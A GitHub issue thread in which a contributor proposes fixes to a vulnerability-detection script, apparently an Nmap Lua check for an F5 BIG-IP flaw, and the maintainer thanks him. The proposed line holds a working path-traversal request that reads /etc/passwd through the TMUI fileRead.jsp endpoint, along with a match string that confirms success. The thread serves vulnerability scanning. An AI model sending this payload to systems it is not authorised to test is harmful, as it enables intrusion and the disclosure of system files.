RootUp / PersonalStuff

Upload files done during my research.
https://inputzero.io
129 stars 48 forks source link

Unreliable - Suggested changes #2

Closed sdcampbell closed 4 years ago

sdcampbell commented 4 years ago

I have found the results to be unreliable. After further testing on a mix of known vulnerable and non-vulnerable systems, I suggest the following changes:

Change line 34 to: local path = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"

Change line 38 to: local match = 'root:x:0:0:root'

RootUp commented 4 years ago

Argh! Thankyou @sdcampbell, I just completely forgot about match